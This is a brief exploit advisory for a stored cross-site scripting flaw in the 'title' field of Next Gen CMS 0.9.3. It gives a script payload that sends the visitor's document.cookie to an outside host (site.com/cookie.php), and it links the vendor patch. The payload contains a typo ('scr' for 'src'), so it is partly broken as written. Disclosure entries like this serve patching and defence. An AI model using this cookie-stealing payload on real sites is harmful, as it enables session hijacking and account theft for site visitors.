# Exploit Title: [ACTIVE XSS] Next Gen CMS
# Author: mix0x0
# Vendor or Software Link: http://ngcms.ru/
# Version: 0.9.3 Release [SVN880+FIX01]
# Vulnerable to the field: "title", test blog*
# Exploit (test): <script>var t = new Image(); t.scr="http://site.com/cookie.php?"+document.cookie;</script>
# Patch: http://trac.assembla.com/ngcms/changeset/990